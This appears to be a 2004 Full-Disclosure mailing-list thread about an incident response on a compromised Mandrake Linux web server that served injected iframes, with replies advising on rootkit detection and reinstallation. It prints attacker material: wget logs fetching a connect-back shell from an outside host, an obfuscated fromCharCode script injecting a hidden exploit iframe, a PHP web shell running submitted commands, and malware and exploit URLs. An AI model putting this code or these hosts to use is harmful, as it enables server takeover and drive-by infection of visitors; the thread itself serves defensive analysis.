Mailing List Archive

xpire.info & splitinfinity.info - exploits in the wild
Hi list,
i'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
In this host now it's installed a special trojan that insert a
malicious <IFRAME> tag into every served .PHP page.

The host is running these services :

Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Porta 22: SSH-1.99-OpenSSH_3.4p1
Porta 25: 220 XXXXX ESMTP 5.5.1
Porta 110: +OK <XXXX@XXXXXX>
Porta 3306: MySQL 3.23.52
Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
Linux/6mdk)
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found inside Apache log that the hacker break-in inside the machine
using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines :

[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
fault (11)
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
fault (11)
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
<angdimar@yahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
fault (11)
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
fault (11)
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowski@libero.it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

0K .......... ........ 100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
fault (11)
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
fault (11)


Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
Linux,
possible containing a ConnectBack shell. Inside this ELF file you can grep
these strings:

Usage: %s host port
pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
Fuck you so
/bin/sh No connect
Looking up %s... Failed!
OK
%u Connect Back

I don't know if the hacker installs in this machine a rootkit, but the check
of md5sum of
ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
was good.......

The main problem is finding how the Apache Server (or PHP) was altered by
the hacker,
because every user that connects to this host now, could be infected by
several HTML/IE recent exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
random way??)
web server inserts a special javascript between HTTP-Header and served page.
The script is :

<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>

Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
to this url :

<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
width=1></iframe>

If you surf to this page (don't do this if you use IE or are not patched)
you could got infected
by several exploits, cause it opens a lot a <iframe> pointing out to
different domains.

I would to list here these domains, cause they are a sources
for exploit studying :

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are :

1) how can I remove this injected Javascript/IFRAME ? I've checked
httpd.conf and a lot of PHP pages,
but I don't found anything.....Is it possible that the hacker install some
compromised Apache module ..so???

2) anyone knows before these sites (xpire.info or splitinfinity.info)?
why they are still online and are serving trojan/exploit on surfer browser?
xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
registration!

Domain ID: D5946452-LRMS
Domain Name: XPIRE.INFO
Created On: 23-May-2004 19:41:15 UTC
Last Updated On: 02-Aug-2004 08:07:20 UTC
Expiration Date: 23-May-2005 19:41:15 UTC
Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
Status: ACTIVE
Status: OK
Registrant ID: C4752858-LRMS
Registrant Name: Mike Fox
Registrant Organization: n/a
Registrant Street1: Hali-gali, 77
Registrant City: Deli
Registrant Postal Code: 12345
Registrant Country: IN
Registrant Phone: +91.226370256
Registrant Email: c8idkvtgarwinidkvt38@yahoo.com


3) how can I understand if a rootkit was installed???

Thanks anyone for replies

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
Ahhhh.......checkout too @
http://lists.netsys.com/pipermail/full-disclosure/2004-October/027350.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio <eflorio@edmaster.it> wrote:
> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
. . .
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".

I'm not sure that qmail-inject isn't a red herring? The actual
download looks like 'wget' was used.

> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimar@yahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowski@libero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......

I assume you used a bootable CD on the infected machine to do the checksums?


> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded. It's also
possilble, but less likely, that the injection is done in a kernel
module.


> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.

Sounds like a good time to replace the entire server with a fresh build.


Kevin

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
> I'm not sure that qmail-inject isn't a red herring? The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.
After other analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here the log trapped by Apache :

----------------------------------------------------------------------------
----
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28-- http://xpire.info/cli.gz
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........ 100% 20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, it's possible to see that in my first showed log
the stdout
was in italian language (cause compromised server is .it), in this case is
in english language.
The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out
In this log you can see also that the hacker also try to execute some "ls"
command,
as first trial to test vulnerability I suppose.
Moved by this, after other analysis I found that vulnerability used is an
obvious-but-effective PHP-Injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The hacker page used to accomplish the injection are based on this
test-page, taken directly on the hacker-site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojan/backdoor/shell/worm/exploit and
other malware....why is it still open?

http://xpire.info/cli.gz // connect back shell
http://xpire.info/fa/aga.exe // agobot family
http://xpire.info/install.gz // some trojan/malware ???? my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
<?
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using PHP "system" call, it possible to execute any remote command, like
WGET for example.
Anyone knows before this page???


> I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD to connect at this remote host very
far from me :)
I'm limited in the analysis.....but the host is not mine!
However I think that md5um give me good results, because I compared all the
/usr/sbin directory
and all the checksum were good, except for /usr/sbin/crond......any ideas???
I used also "rpm -Vf" utility to cross check results, and were the same of
md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded. It's also
> possilble, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all *.conf related to Apache/PHP modules
of this
machine, but nothing was found. A LKM injected could be the only response.

I also ran "chkrootkit" as someone suggest to me, but all the test give
positive answer
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :))))))

Thank you for the help, Kevin.

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
Elia Florio wrote:

> > I'm not sure that qmail-inject isn't a red herring? The actual
> > download looks like 'wget' was used.
> Good suggestion, my friend :)
>
> It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.

More specifically, from the strings in the binary it looks awfully like
sd's bindtty -- try Googling for "bindtty.c"...

The possible bad news is that bindtty is used in the suckit rootkit, so
your remote-only access may cause major (if not insurmountable)
problems to doing a half-useful diagnosis...

<<big snip>>
> The hacker page used to accomplish the injection are based on this
> test-page, taken directly on the hacker-site :-)
>
> http://xpire.info/s/2
> http://xpire.info/s/
>
> I notice that this site is full of trojan/backdoor/shell/worm/exploit and
> other malware....why is it still open?

You'd be surprised how few folk actually compain about a lot of these
sites. Compound that with the rate of incompetence at many small (and
even many not-so-small) ISPs, where the very thin margins mean they
don't have time (and seldom good enough staff anyway) to analyse such
complaints, and where the emphasis is often more on making sure they
get their $10, $20, $40, etc this month from that customer, and many
such sites stay up way too long. The way to break such sites is for
some "authority" to contact them (a CERT, law enforcement, etc) or
"enough" polite, professional, clearly technically competent but not
overly technical complaints explaining what the site is being used for
and why it should be shut down. Of course, often the "base" sites are
themselves simply just ill-maintained systems that have, themselves,
been hacked and if all the ISP is up to doing is closing the apparently
rogue site/account, or simply removing the "offending content" the site
(and others similarly hosted on the still badly maintained servers)
remains open to further, similar abuse.


Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
as pertains to compromised systems, the besty advice, unless you are doing
forensics to get a handle upon how the system was compromised or seeking
legal damages, is to just plain reinstall and make sure the system is
patched and properly firewalled prior to reconnecting it to the internet.
anything less then a reinstall is likely to permit the attacker to regain
entry to the system. Two points to mention, mysql should not be available
to the public, it should be firewalled off from public consumption, if it
can;'t be outright killed and uninstalled. php, is a problematic
scripting language, and requires someone with intense focus upon security
to lockdown. Never use the vast majority of php packages publically
available, we see 5-10 of them weekly suffering from security issues, some
popping up on a weekly or bi-weekly schedule.

3rd point, in these times with scp and sftp available, ftpd should be
turned off, uninstalled and access only granted via scp/sftp for file
transfers to a server.

Thanks,

Ron DuFresne


On Sun, 24 Oct 2004, Elia Florio wrote:

> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
>
> The host is running these services :
>
> Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
> Porta 22: SSH-1.99-OpenSSH_3.4p1
> Porta 25: 220 XXXXX ESMTP 5.5.1
> Porta 110: +OK <XXXX@XXXXXX>
> Porta 3306: MySQL 3.23.52
> Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
> Linux/6mdk)
> sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
>
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimar@yahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowski@libero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......
>
> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.
> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.
> The script is :
>
> <script language=javascript>
> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
> 01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
> ,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
> 5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
> 16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
> 41))
> </script>
>
> Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
> to this url :
>
> <iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
> width=1></iframe>
>
> If you surf to this page (don't do this if you use IE or are not patched)
> you could got infected
> by several exploits, cause it opens a lot a <iframe> pointing out to
> different domains.
>
> I would to list here these domains, cause they are a sources
> for exploit studying :
>
> Domain: www.sp2fucked.biz
> http://69.50.168.147/user28/counter.htm
>
> Found MHTMLRedir.Exploit
> http://213.159.117.133/dl/adv121.php
>
> http://195.178.160.30/js.php?cust=28
>
> http://195.178.160.30/ifr.php?cust=89
>
> http://69.50.168.147/user28/exploit.htm
>
> Found Java class exploit
> http://69.50.168.147/user28/exploit2.htm
>
> My questions are :
>
> 1) how can I remove this injected Javascript/IFRAME ? I've checked
> httpd.conf and a lot of PHP pages,
> but I don't found anything.....Is it possible that the hacker install some
> compromised Apache module ..so???
>
> 2) anyone knows before these sites (xpire.info or splitinfinity.info)?
> why they are still online and are serving trojan/exploit on surfer browser?
> xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
> registration!
>
> Domain ID: D5946452-LRMS
> Domain Name: XPIRE.INFO
> Created On: 23-May-2004 19:41:15 UTC
> Last Updated On: 02-Aug-2004 08:07:20 UTC
> Expiration Date: 23-May-2005 19:41:15 UTC
> Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
> (R159-LRMS)
> Status: ACTIVE
> Status: OK
> Registrant ID: C4752858-LRMS
> Registrant Name: Mike Fox
> Registrant Organization: n/a
> Registrant Street1: Hali-gali, 77
> Registrant City: Deli
> Registrant Postal Code: 12345
> Registrant Country: IN
> Registrant Phone: +91.226370256
> Registrant Email: c8idkvtgarwinidkvt38@yahoo.com
>
>
> 3) how can I understand if a rootkit was installed???
>
> Thanks anyone for replies
>
> EF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
Finally, I clean the compromised box of my friend :))
I've found (following many helpful suggestions of people in FD list)
that a variant of "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
in any way and they said that everything is ok.

To found suckit and deactivate it I used this :
http://tsd.student.utwente.nl/skdetect/
It's a code based on suckit source code, but without the malware part.
It can dig into /dev/kmem and explores sys_call_table[];
skdetect was able to found suckit installed.
Another person who was compromised by the "xpire.info" hacker said to me
that
the symptoms were the same and also in his host he found this suckit variant
installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After reboot everything come back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on "xpire.info/fa/?d=get" malware page you can found this exploits
in the wild :

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME#
#iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
#iframe src="http://213.159.117.133/dl/adv121.php" width=1
height=1></iframe#
!-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME#
//-->

There a lot of backdoor/trojan ready-to-install and the bad news is that
most
of this malware are recompiled, so many AV are fooled and don't catch them
(for example Symantec and ClamAV don' recognize many malware
in this site, after a quick test made with www.virustotal.com)

Bye,
EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
On Wed, 27 Oct 2004, Elia Florio wrote:

> There a lot of backdoor/trojan ready-to-install and the bad news is that
> most
> of this malware are recompiled, so many AV are fooled and don't catch them
> (for example Symantec and ClamAV don' recognize many malware
> in this site, after a quick test made with www.virustotal.com)

If you have some time, could you assist the clamav team and send them a
detailed report with your findings and the undetected code bits?

They will appreciate your cooperation in this.

Hugo.

--
I hate duplicates. Just reply to the relevant mailinglist.
hvdkooij@vanderkooij.org http://hvdkooij.xs4all.nl/
Don't meddle in the affairs of magicians,
for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
>> (for example Symantec and ClamAV don' recognize many malware
>> in this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support Clam team....they're working
hard for a valuable open-source AV and I appreciate this too!
I can send to them my reports (extracted from virustotal.com) and
the un-detect files (exe,dll,class,javascript,html) with
malware/trojan and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF

________________________________________________
Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild [ In reply to ]
On Wed, 27 Oct 2004, Elia Florio wrote:

> Of course, I'd like to support Clam team....they're working
> hard for a valuable open-source AV and I appreciate this too!
> I can send to them my reports (extracted from virustotal.com) and
> the un-detect files (exe,dll,class,javascript,html) with
> malware/trojan and exploits taken from "xpire.info".
>
> Where do I send this archive? What's the mail address?
> Must I use a PGP key or simply a password-protected zip?

The following page should inform you about everything you need to know:
http://clamav.catt.com/cgi-bin/sendvirus.cgi

Hugo.

--
I hate duplicates. Just reply to the relevant mailinglist.
hvdkooij@vanderkooij.org http://hvdkooij.xs4all.nl/
Don't meddle in the affairs of magicians,
for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html